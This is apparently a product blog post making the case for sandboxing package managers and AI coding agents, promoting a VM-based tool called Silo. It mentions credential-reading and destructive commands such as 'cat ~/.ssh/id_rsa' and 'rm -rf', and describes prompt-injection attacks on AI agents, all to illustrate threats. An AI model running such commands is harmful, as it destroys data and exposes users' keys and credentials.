The case for sandboxing your dev tools

Package managers execute arbitrary code. AI coding agents execute arbitrary commands. Both get full user permissions by default. Here's why that has to change.

Two classes of tools routinely execute untrusted code with full user permissions on your laptop. One is old, one is new, and both are being actively exploited.

Class one: package managers

Every time you run npm install, pip install, or cargo install, you’re authorising arbitrary code execution on your machine. Packages can run postinstall scripts, setup.py blocks, and build steps — all with the same permissions as you. They can read ~/.ssh/id_rsa, send ~/.aws/credentials to a remote server, enumerate your other repos, and install a launch agent that survives reboot.

Recent supply-chain attacks show this isn’t theoretical:

The typical response is “audit your dependencies.” That doesn’t scale. A modern Node project has thousands of transitive dependencies; a single compromised maintainer anywhere in that tree is enough.

Class two: AI coding agents

Claude Code, Cursor, Copilot Agents, and their peers read your codebase, edit files, and run shell commands on your behalf. When they work correctly they’re extraordinary productivity tools. When something goes wrong — a prompt injection buried in a README, a hallucinated rm -rf, a confused agent that decides to “clean up” a directory — the blast radius is everything you can touch: SSH keys, cloud credentials, keychain entries, other projects, unrestricted outbound network.

The usual mitigations are permission prompts (“allow this command?”) and YOLO-mode regret. Neither is structural. An attacker who can craft input reaching the agent can eventually craft input the agent will follow, and the user who clicks through prompts all day will click through the bad one too.

What a real boundary looks like

The answer isn’t more prompts or better linters. It’s running these tools somewhere they can’t see anything they don’t need.

Silo does this by running each tool inside a lightweight Apple Container VM — a real Linux kernel, not a process namespace. The VM sees the current project directory and explicitly-passed environment variables. That’s it.

 Without SiloWith Silo
~/.ssh, ~/.aws, ~/.gnupgFull accessDo not exist
All environment variablesVisibleOnly explicitly passed
Persistent RAT in user spacePossibleDies with ephemeral VM
Lateral movement to other projectsPossibleOnly current project mounted
macOS keychain, browser dataAccessibleBlocked (separate kernel)
Unrestricted outbound networkYesProxy allowlist per tool

This is the same kind of boundary you’d get running your agent in a cloud sandbox, but with none of the latency, none of the git-mirroring pain, and none of the billing surprises. It starts in ~600ms on your own hardware.

What stops working

Almost nothing, in practice. You still run python script.py. You still run npm install. You still run claude in the project root. The difference is that the postinstall that just tried to cat ~/.ssh/id_rsa got back “no such file” — because there’s nothing there to steal.

If you’re writing software on macOS and your dev loop involves running third-party code or an AI agent, the question isn’t whether you need a sandbox. It’s which one, and whether the overhead is low enough that you’ll actually use it.

Install Silo →

← all posts